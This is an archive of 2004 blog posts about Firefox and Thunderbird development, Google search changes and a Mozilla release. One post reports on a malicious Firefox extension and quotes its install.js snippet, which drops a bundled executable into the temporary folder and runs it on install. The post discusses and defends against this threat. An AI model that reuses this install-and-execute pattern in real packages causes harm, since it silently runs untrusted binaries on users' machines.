• Mar 30, 2004

    Firefox Extension Manager

    Looking at the recent checkins to the Firefox source tree, you can see that Ben Goodger has checked in the initial files for the upcoming Extension Manager (see bug 170006). The Extension Manager aims to provide for extension uninstallation (currently, you can only disable via the UI - you can, however, remove extensions manually), extension updating, and (hopefully) some level of standardization of extension installation UI screens.

    Forcing extensions to have to provide a choice of whether to be installed to the profile folder or to the application folder is another thing I'd like to see (or at least warn the user that the extension will be installed to the profile folder). Probably wouldn't matter too much when you can easily uninstall extensions with the Extension Manager.

    Henrik Gemal reports on the same thing, and points out ASCII art mock screens and Ben Goodger's writeup on the new take on extensions. Mozilla.org also has a section on Application extensions, where the Extension Manager is described (some pages are empty at the moment). Interesting reading all.

    There are also plans for a Web Front End (see Ben's new take on extensions), if you were wondering how updating extensions was to be done. The Web Front End will also be the central link and information repository for compatible and verified extensions (much like what Extension Room is now) - a partial solution to the malicious XPIs problem perhaps?

  • Mar 29, 2004

    Google's facelift is official, Personalized Web Search

    Dogtoe reports that Google's new look is official. Previously you could get the new look with a bookmarklet.

    I also came across this Personalized Web Search at Google Labs which I think is new (could someone confirm?). You can specify a profile (which is saved in a cookie), search for something, and move a slider to increase or decrease the degree of personalization of your search results.

    Google Personalized Web Search slider screenshot

    That's pretty awesome.

    Google has developed new algorithms that dynamically reorder results by weighting the interests you enter in your profile. When you move the slider, it recalculates and rearranges the results to add more or less emphasis on your profile information.

  • Mar 27, 2004

    Default Thunderbird theme icons and usability

    allen has an excellent and constructive evaluation on the usability of the default Thunderbird theme (Qute) icons in this thread at MozillaZine forums.

    Screenshot of Thunderbird Qute theme icons

    Interestingly enough, I've used Thunderbird since before the current default theme was instituted and never noticed the usability flaws of some of the icons before I read allen's post. I tend to read the text labels, rather than decipher the meaning of an icon. Nevertheless, I can see fully how the icons are confusing and don't convey the true intention of their actions - a new user could be slightly addled without the assistance of text labels.

    Well, it all goes to show how little benefit I've derived from the HCI module I'm taking this semester.

    Note: No Qute theme-bashing, please (and none ever intended) - Qute is actually a theme that I really like, in fact.

  • Mar 27, 2004

    Malicious XPIs run executable binaries

    Flexer recently posted his encounter with a website that tried to get him to install a malicious XPI (Firefox extension). Upon the user clicking "Install", the install.js (the script that performs the actual installation) tries to execute the contained executable, which is xxxtoolbar, as Paradox52525 reports.

    Here's a snippet of the code in the install.js:

    var xpiSrc = "istinstall_netscape.exe";
    initInstall("Adding a File",
    "addFile",
    "1.0.1.7",
    1);
    f = getFolder("Temporary");
    setPackageFolder(f);
    addFile(xpiSrc);
    execute(xpiSrc,"",false);

    Arthur_Dent breaks down exactly what the XPI and the contained executable does in his post.

    Best solution, to me? Verified and digitally signed XPIs are allowed to run without hindrance. For unverified XPIs, warn the user that of that fact, and that the XPI will directly run executable code. Require an extra step of confirmation. That's what I think at the moment, but there are some pretty good ideas in that thread. It'll be interesting to see how this is dealt with in the near future.

    Follow the discussion on MozillaZine forums.

    Update: See relevant bug 238684.

  • Mar 19, 2004

    Deletion of autocomplete results in Firefox, Mozilla 1.7b released

    Now here's a nice feature just checked into the Mozilla Firefox source tree that everyone wants - deletion of autocomplete results (bug 171605). There's always the odd occasion where you want to just remove a certain entry, but don't want to have to clear your browser history (and consequently lose everything else that you want to keep). How does it work? Just do a Shift-Delete when the autocomplete result you want is selected.

    ff-autocomplete.png


    Another bugfix is the depiction of application-specific icons in the download manager - check out Ben Goodger's screenshot. Spiffy.

    Get the latest nightly (2004-03-18) to see these changes for yourself.

    In related news, Mozilla 1.7b has been released. Noteworthy changes include the Password Manager, IMAP IDLE command support for Mail/News, and the return of the Talkback crash reporting utility (only in installer builds). This is also very encouraging:

    When compared to Mozilla 1.6, Mozilla 1.7 Beta is 7% faster at startup, is 8% faster at window open time, has 9% faster pageloading times, and is 5% smaller in binary size.

    Get Mozilla 1.7b.

    Source: Bonsai query for mozilla/browser mozilla/toolkit mozilla/chrome in the past week

subscribe via RSS